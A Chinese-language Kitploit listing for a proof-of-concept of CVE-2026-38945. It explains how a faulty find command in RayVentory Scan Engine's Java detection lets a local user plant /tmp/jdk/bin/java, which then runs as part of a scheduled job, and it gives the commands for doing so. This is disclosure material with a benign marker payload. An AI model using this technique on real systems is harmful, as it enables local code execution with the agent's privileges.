Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-38945 — Proof-of-concept for CVE-2026-38945: path traversal in RayVentory Scan Engine's Java detection allows local attackers to execute arbitrary binaries via crafted directory structures. | Kitploit
工具/GitHubGitHub/wise-security/cve-2026-38945
漏洞分析漏洞利用渗透测试供应链安全学习与教育二进制利用
GitHubwise-security/cve-2026-38945

CVE-2026-38945

Proof-of-concept for CVE-2026-38945: path traversal in RayVentory Scan Engine's Java detection allows local attackers to execute arbitrary binaries via crafted directory structures.

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-38945

  • 作者: Rafael José Núñez Gulías
  • 公司: Iberian Var Group
  • 受影响产品: RayVentory Scan Engine 12.6 Update 8 及更早版本
  • Raynet 公告: RSEC200967

rvia 在 Raynet 中执行一个 find 命令,该命令的搜索条件未正确终止,以定位 Java 安装。攻击者可以构造满足错误搜索条件的特定目录结构,导致代理程序在 Java 检测过程中执行恶意二进制文件。

stringsfindcommand.png

root@kitploit:~
/bin/sh -c "find / -not \( -path '/dev' -o -path '/etc' -o -path '/mnt' -o -path '/tmp' -o -path '/proc' \) \( -path '*/jdk/bin/java' -o -path '*/jdk/jre/bin/java' -o -path '*/jdk-*/bin/java' -o -path '*/jdk*/bin/java' -o -path '*/jdk*/jre/bin/java' \) \( -type f -o -type l \)"

该命令本应忽略 /tmp 下的 Java 二进制文件(同时也应忽略 /dev、/etc、/mnt 和 /proc,但我们关注的是 /tmp 的示例,因为它是全局可写的)。

注意,缺少对其他潜在危险目录(如 /home)的排除。

问题在于,命令的第一部分旨在忽略特定目录,但这些目录末尾缺少字符 *,而 * 字符被用于其他要搜索的目录的开头。

这使得任何用户都可以篡改 Java 检测过程中执行的 Java 文件,因为 oracle 选项通常作为 cron 任务运行。

root@kitploit:~
mkdir -p /tmp/jdk/bin
echo 'echo "rvia oracle was executed!" > /tmp/PoC' > /tmp/jdk/bin/java && chmod +rx /tmp/jdk/bin/java

executionflow.png

这是因为当使用 oracle 选项时,“如果 Java 运行时路径未在 /opt/rvia/rvia.cfg 文件中配置,RayVentory Scan Engine 仍会在需要时尝试自动查找。”而在某个时刻,它会尝试通过执行 java -version 来获取已安装的 Java 环境的版本。

下载工具